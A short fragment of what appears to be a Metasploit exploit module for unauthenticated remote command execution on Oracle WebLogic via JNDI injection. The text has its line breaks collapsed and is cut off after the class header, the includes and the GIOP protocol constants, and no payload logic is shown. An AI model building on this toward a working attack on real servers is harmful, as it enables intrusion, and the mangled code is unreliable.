Oracle Weblogic PreAuth Remote Command Execution
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::Tcpinclude Exploit::Remote::JndiInjectionprepend Msf::Exploit::Remote::AutoCheck# Page 19 of https://docs.oracle.com/cd/E13211_01/wle/wle42/corba/giop.pdf explains these codes.GIOP_REQUEST = 0GIOP_REPLY = 1GIOP_CANCEL_REQUEST = 2GIOP_LOCATE_REQUEST = 3GIOP_LOCATE_REPLY = 4GIOP_CLOSE_CONNECTION = 5GIOP_MESSAGE_ERROR = 6GIOP_FRAGMENT = 7# Taken from page 561 of htt...